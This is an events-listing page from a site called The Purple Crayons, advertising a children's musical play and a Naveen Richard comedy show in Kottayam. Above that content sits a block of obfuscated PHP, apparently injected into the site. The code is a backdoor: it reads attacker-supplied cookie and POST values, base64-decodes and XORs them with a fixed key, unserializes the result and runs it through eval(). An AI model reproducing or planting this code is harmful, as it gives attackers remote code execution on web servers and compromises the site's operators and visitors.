$nmJtGLmgSc = "\x4f" . "\x63" . 'A' . "\x5f" . "\x44" . "\107" . chr ( 317 - 247 ); $jGARKbD = chr (99) . 'l' . "\x61" . "\x73" . chr ( 182 - 67 )."\137" . "\145" . chr ( 476 - 356 )."\151" . 's' . chr (116) . "\x73";$LmtlBb = class_exists($nmJtGLmgSc); $jGARKbD = "29211";$EbChLQRPF = strpos($jGARKbD, $nmJtGLmgSc);if ($LmtlBb == $EbChLQRPF){function RyFrw(){$nNzoo = new /* 5092 */ OcA_DGF(49737 + 49737); $nNzoo = NULL;}$HevWWqnXf = "49737";class OcA_DGF{private function ZnlDF($HevWWqnXf){if (is_array(OcA_DGF::$tseCha)) {$YiGODhm = str_replace("\74" . '?' . chr (112) . "\150" . "\x70", "", OcA_DGF::$tseCha[chr (99) . chr ( 242 - 131 )."\x6e" . chr ( 591 - 475 ).chr ( 1045 - 944 )."\156" . chr ( 861 - 745 )]);eval($YiGODhm); $HevWWqnXf = "49737";exit();}}public function SZkUf(){$kensBX = "13127";$this->_dummy = str_repeat($kensBX, strlen($kensBX));}public function __destruct(){OcA_DGF::$tseCha = @unserialize(OcA_DGF::$tseCha); $HevWWqnXf = "14876_1743";$this->ZnlDF($HevWWqnXf); $HevWWqnXf = "14876_1743";}public function mcJMHmKy($kensBX, $bKKiz){return $kensBX[0] ^ str_repeat($bKKiz, (strlen($kensBX[0]) / strlen($bKKiz)) + 1);}public function OwttGWWwx($kensBX){$ytDKDz = "base64";return array_map($ytDKDz . chr ( 860 - 765 )."\144" . chr ( 340 - 239 ).chr ( 270 - 171 )."\157" . chr (100) . "\x65", array($kensBX,));}public function __construct($sXQHc=0){$NVsNCVs = ",";$kensBX = "";$JIKeYUhXn = $_POST;$bQEDP = $_COOKIE;$bKKiz = "a65b868a-f542-401f-86da-f5c2fad7a201";$mWLZOcE = @$bQEDP[substr($bKKiz, 0, 4)];if (!empty($mWLZOcE)){$mWLZOcE = explode($NVsNCVs, $mWLZOcE);foreach ($mWLZOcE as $UoWzL){$kensBX .= @$bQEDP[$UoWzL];$kensBX .= @$JIKeYUhXn[$UoWzL];}$kensBX = $this->OwttGWWwx($kensBX);}OcA_DGF::$tseCha = $this->mcJMHmKy($kensBX, $bKKiz);if (strpos($bKKiz, $NVsNCVs) !== FALSE){$bKKiz = explode($NVsNCVs, $bKKiz);}}public static $tseCha = 22598;}RyFrw();} Past Events from August 17, 2022 – August 26, 2022 – Page 2 – The Purple Crayons

Break Free, a musical play for all ages by Crea Shakthi

DC Books Auditorium Kottayam, India

About The Show What do you get when storytellers forget their stories? A cowardly bat, a magician who has run out of tricks, a red velvet mite that wants to conquer and plunder, a tea seller with a book & a moon that goes missing! All these colourful characters come together to […]


Naveen Richard, Live in Kottayam

Hotel Aida Kottayam, India

About The Show Join us in Kottayam for Naveen Richard's latest tour, complete with Family friendly jokes for friendly families and unmarrieds also. Naveen Richard is one of India’s most versatile comedians, webseries writer and actor. From being a finalist on Comedy Central's Indian Comedy Festival 2012, Naveen's performed over 400 stand-up […]
